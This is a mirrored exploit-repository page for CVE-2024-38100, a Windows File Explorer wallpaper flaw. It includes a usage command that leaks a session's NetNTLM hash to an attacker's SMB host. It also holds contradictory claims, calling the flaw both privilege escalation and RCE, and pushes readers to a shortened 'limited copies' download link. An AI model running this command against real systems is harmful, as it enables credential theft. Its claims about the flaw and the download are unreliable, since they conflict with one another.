Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-38100 PoC — Microsoft Windows File Explorer 安全漏洞

Source
https://github.com/Florian-Hoth/CVE-2024-38100-RCE-POC
Associated Vulnerability
Title:Microsoft Windows File Explorer 安全漏洞 (CVE-2024-38100)
Description:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在安全漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows Server 2019,Windows Server 2019 (Server Core installation),Windows Server 2022,Windows Server 2022 (Server Core install
Description
CVE-2024-38100 Windows Leaked Wallpaper Escelation to RCE vulnerability
Readme
# CVE-2024-38100
CVE-2024-38100 Windows Leaked Wallpaper Escelation to RCE vulnerability

![CVE-2024-38100](three.png?raw=true "CVE-2024-38100")


## CVE description
In a recent security bulletin, Microsoft disclosed a critical vulnerability in Windows File Explorer, identified as CVE-2024-38100, with a CVSS score of 7.8 This is a privilege escalation tool that allows us to leak a user's NetNTLM hash from any session on a computer and gain Remote Code Execution. 

Usage:
```
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg

# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg
```

![CVE-2024-38100](two.png?raw=true "CVE-2024-38100")

![CVE-2024-38100](three.png?raw=true "CVE-2024-38100")


## Who is vulnerable?
Tested vulnerable hosts:
Any system not patched in the July Tuesday patch. 


## CVE-2024-38100 download exploit
As mentioned at the beginning, CVE-2024-38100 was given such a high CVSS score because it is remote code execution. This means it can go unnoticed by the user and potentially by the security team as well. Such a powerfull tool should not be fully public, there is strictly only a few copies available so a REAL researcher can use it: https:// shorturl[.]at/5xHw2

This should attract attention to importance of cyber security, it can be tempting to ignore, or palm it off to the IT team. But both of these options can leave you susceptible to real and damaging risks. Do NOT resell or leak this PoC or you can be at risk of breaking the law.


## Patching
Microsoft addressed this vulnerability in the July Patch Tuesday update, releasing the fix under KB5040434.

## Detection
No detection yet.

## Mitigation
Users and administrators are strongly advised to apply this update immediately to protect their systems from potential exploitation.


## Disclamer

This project is intended for educational purposes only and cannot be used for law violation or personal gain.
The authors of this project is not responsible for any damages caused by direct or indirect use of the information or functionality provided by those script.
File Snapshot

 [4.0K]  /data/pocs/de0767005ea73d6d8de52da3834f2f345ee03ecd
├── [1.1K]  automate.py
├── [1.1K]  check_targets.py
├── [1.1K]  CVE-2024-38100.py
├── [ 15M]  demo.mkv
├── [ 56K]  one.png
├── [2.0K]  README.md
├── [742K]  three.png
└── [232K]  two.png

0 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.